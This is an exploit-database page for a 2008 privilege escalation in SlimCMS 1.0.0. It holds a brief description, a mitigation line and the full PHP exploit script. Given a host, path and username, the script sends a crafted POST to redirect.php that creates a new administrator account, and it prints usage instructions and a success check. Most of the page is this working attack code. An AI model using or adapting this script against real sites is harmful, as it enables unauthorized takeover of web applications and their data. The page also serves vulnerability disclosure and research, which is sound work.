SlimCMS - exploit.company

vendor:

SlimCMS

by:

StAkeR aka athos

7.5

CVSS

HIGH

Privilege Escalation

264

CWE

Product Name: SlimCMS

Affected Version From: 1.0.0

Affected Version To: 1.0.0

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

SlimCMS <= 1.0.0 Privilege Escalation Exploit

This exploit allows an attacker to gain administrator privileges on SlimCMS version 1.0.0 and below. The exploit works by sending a POST request to the redirect.php file with the newusername, newpassword, and newisadmin parameters set to the desired username and a value of 1 for newisadmin. If successful, the attacker will be able to log in with the specified username and password and have administrator privileges.

Mitigation:

Upgrade to the latest version of SlimCMS.

Source

Exploit-DB raw data:

#!/usr/bin/php -q
<?php

/*
   SlimCMS <= 1.0.0 Privilege Escalation Exploit
   Discovered By StAkeR aka athos - StAkeR[at]hotmail[dot]it
   Discovered On 11/10/2008
   http://downloads.sourceforge.net/slimcms/SlimCMS-1.0.0.tgz?modtime=1217343227&big_mirror=0
*/


error_reporting(0);

$host = $argv[1];
$host = str_replace('http://',NULL,$host);
$path = $argv[2]."/redirect.php";
$user = $argv[3];

if(!preg_match('/http:\/\/(.+?)$/',$host) and strlen($user) < 5)
{
  echo "[?] Usage: php $argv[0][host][path][username]\r\n";
  echo "[?] Usage: php $argv[0] http://localhost /cms milw0rm\r\n";
  exit;
}

if(!$sock = fsockopen($host,80)) 
{
  die("Socket Error\r\n");
}

$post .= "newusername=$user&newpassword=$user&newisadmin=1";
$data .= "POST /$path HTTP/1.1\r\n";
$data .= "Host: $host\r\n";
$data .= "User-Agent: Mozilla/4.5 [en] (Win95; U)\r\n";
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
$data .= "Content-Length: ".strlen($post)."\r\n";
$data .= "Connection: close\r\n\r\n";
$data .= "$post\r\n\r\n";

fputs($sock,$data);

while(!feof($sock)) 
{
  $content .= fgets($sock);
} fclose($sock); 

if(eregi('change.php',$content))
{
  echo "[?] Added New Administrator!\r\n";
  echo "[?] Username and Password: $user\r\n";
  exit;
}
else
{
  echo "[?] Exploit Failed!\n";
}


?>

# milw0rm.com [2008-10-10]